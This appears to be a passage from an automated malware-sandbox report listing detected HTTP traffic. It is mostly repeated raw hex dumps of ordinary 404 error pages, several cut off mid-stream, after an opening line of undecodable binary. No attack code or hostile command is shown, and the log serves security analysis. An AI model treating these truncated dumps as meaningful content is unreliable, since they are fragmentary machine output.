Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Mon, 09 Dec 2024 08:11:11 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 
22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 08:11:43 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 08:11:46 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 08:11:49 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Dec 2024 08:11:51 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 09 Dec 2024 08:12:23 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 09 Dec 2024 08:12:26 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 09 Dec 2024 08:12:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 
69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:12:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 08:12:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 